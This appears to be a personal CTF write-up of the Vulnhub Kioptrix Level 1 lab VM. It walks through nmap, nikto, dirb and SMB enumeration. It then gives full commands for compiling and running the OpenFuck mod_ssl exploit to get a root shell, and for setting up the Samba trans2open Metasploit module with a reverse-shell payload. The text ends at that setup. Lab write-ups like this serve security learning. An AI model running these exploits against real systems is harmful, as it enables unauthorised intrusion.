CTF Challenge: Kioptrix level 1

9 min readJan 1, 2021

This is my first time trying out Vulnhub machine and learn as much as possible 💪 😄

Description:

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more than one ways to successfully complete the challenges.

Goal:

There is a single flag that need to be acquired in the root user’s mail box.

Download Source:

Download from here 👉https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

SETUP:

Personally, I am using Virtual Box to host both the KALI LINUX and Keoptrix Level VM Machine.

Here the following steps that I have gone thru to setup Kioptrix VM:

After downloaded the Kioptrix File from the Vulnhub source website, Create a new VM in Virtual Box and remember to choose “Do not add a virtual hard disk”, which later will be added in the setting of VM:

Click on the create button and wait for the VM to be created and appeared in the VM list.

Right Click on the “Kioptrix ver 1.0” and select the Setting for the VM.
Disable few of the unwanted settings for the VM. For instance, uncheck the Enabled Audio.

Next, under the Network pane in the left hand side, I personally will be choosing the NAT Network type. Of course, we may also choose other network type like bridge adapter.

Select the Storage pane in left hand side and Select Controller IDE under storage Devices. Select Add Hard Disk > Choose the existing disk > Locate and add the Kioptrix vmdk file.

After that Click Ok and Save all the settings just made.
Start and boot the VM Machine. If there is a prompt message appeared, you can just select do nothing and continue.

If the VM us successfully booted and you should be able to see this.

DISCOVERY:

First, I try to use netdiscover to search for the Kioptrix VM IP address but failed to do so in NAT network. I try to research about it. (Command: netdiscover –r 10.0.2.0/24 and I am using 10.0.2.0/24 because my Kali Machine IP Address is 10.0.2.15).

Reason: Netdiscover uses Address Resolution Protocol (ARP) which assign IP Address to MAC Address. ARP by design will not cross network boundaries segregated by layer 3 routing or switch virtual interfaces (SVI) running at layer 3. This is because ARP Packets will not be forwarded on by these layer 3 devices.
For Netdiscover to be work, you will need to configure the virtualized environment to use Bridged Network Adapter connection. This will enable the ARP packets to be sent beyond the local virtualized network boundaries.

Then, I will be using NMAP to search for the Keoptrix IP address. And seems like the 10.0.2.7 is our target. (Command: nmap 10.0.2.0/24)

DETAIL SCANNING / ENUMERATION:

Next, I try to run the nmap with -A command that enables OS detection, version detection, script scanning, and traceroute. (Command: nmap 10.0.2.7 -A)

Here, I found some interesting ports:

· Port 22: old version of SSH

· Port 80 and 443: The VM have web application

· Port 139: Probably SMB2

Then, I take a closer look to TCP ports 80 with Nikto. Nikto managed to find CVE 2002–0082, which is exploitable to remote shell. Let’s research it in later steps after confirm with other options. (Command: nikto -host 10.0.2.7 and the port is not stated because the port 80 is default. However, if you want to specific another port then use -port. For instance: nikto -host 10.0.2.7 -port 443)

Then, I use nbtscan to reassures that the IP address is my target Kioptrix VM machine. (Command: nbtscan -f 10.0.2.7)

WEB SCAN:

Both the HTTP and HTTPS sites are just normal APACHE landing sites, so nothing valuable can be found. Let’s run dirb to see what we can find. (Command: dirb http://10.0.2.7)

Three Directory is found:

· http://10.0.2.7/manual/

· http://10.0.2.7/mrtg/

· http://10.0.2.7/usage/

Then, I try to search for the php and html extension file(Command: dirb http://10.0.2.7 -X .php,.html )

The result from two of the dirb scan shows that both the test.php and mrtg directory looks promising.
Well, this is disappointing and given that we are obtaining the PHP code back, I think probably that the PHP handler is not setup properly on the Apache Server. (Command: curl http://10.0.2.7/test.php)

Seems like I am able to get the Multi Router Traffic Grapher application. Let’s see if we are able to find any exploits for it.

Unfortunately, searchsploit is not able to find any exploits for the mrtg.

I search in the CVE Details and found two available. However, both of the CVE is not the same version of MRTG that we found before and seems that not working on this current system. Now, it is time to move on.

SMB:

I am using enum4linux to enumerate the SMB service. However, it returns an error. (Command: enum4linux -a 10.0.2.7)

So I will be using the scanner in the Metasploit to search for the smb version. Now, I have the Samba version and I can research about it later. (Command: msfconsole , use auxiliary/scanner/smb/smb_version, set rhost 10.0.2.7, run)

Exploiting OpenSSH:

Found this two exploit for the OpenSSH version 2.9p2 and can’t figure out the way to use it so I just move on with it. (Command: searchsploit “openssh” )

Exploiting Apache:

After reviewing the findings from Nikto, it was determined that CVE-2002–0082 exist and exploitable to produce remote shell. I am able to find 3 exploits in searchsploit thus I pick the latest one. With –w, I am able to look into the code by clicking on the link. (Command: searchsploit “mod_ssl 2.8.7” )

Exploit Database link and related information is shown when I click on the link provided.

Next, I exit the root and copied the exploit(47080.c) needed into the specified place (home/kali) that I needed to compile the code and run it. (Command: cp /usr/share/exploitdb/exploits/unix/remote/47080.c home/kali) the directory for the exploits is found in the result of searchsploit.

Install the ssl-dev library and compile it. If the ssl-dev library is not installed, an error will appeared. (Command: sudo apt-get install libssl-dev , gcc -o OpenFuck 47080.c -lcrypto)

Run the exploit and see which supported offset is suitable for apache 1.3.20. But the list is a bit of too long to read. (Command: ./OpenFuck)

The apache version is found with the grep command which is much more easier. (Command: ./OpenFuck | grep 1.3.20)

Based on the Goodbye message, the hex value fail to obtain a shell. Let’s try another one. (Command: ./OpenFuck 0x6a 10.0.2.7)

After trying out the second offset, I get the shell with root access. However, sometimes I need to retry the commands few times in order for it to work. (Command: ./OpenFuck 0x6b 10.0.2.7)

Exploiting with SMB:

Research on the Samba Version and find one that uses Metasploit for CVE 2003–0201 with cvedetails website and searchsploit command.

Open the Metasploit and find the exploits. (Command: search cve:2003–0201). Then use the trans2open exploits. (Command: use exploit/linux/samba/trans2open)

Set rhost as target machine. (Command: set rhost 10.0.2.7)

There is an issues with open the session when I run it. Seems that payload is required after some research done. (Command: run)

Since the remote server appears to be Linux X86 OS, a payload reverse shell for X86 will be used. (Command: set payload linux/x86/shell_reverse_tcp)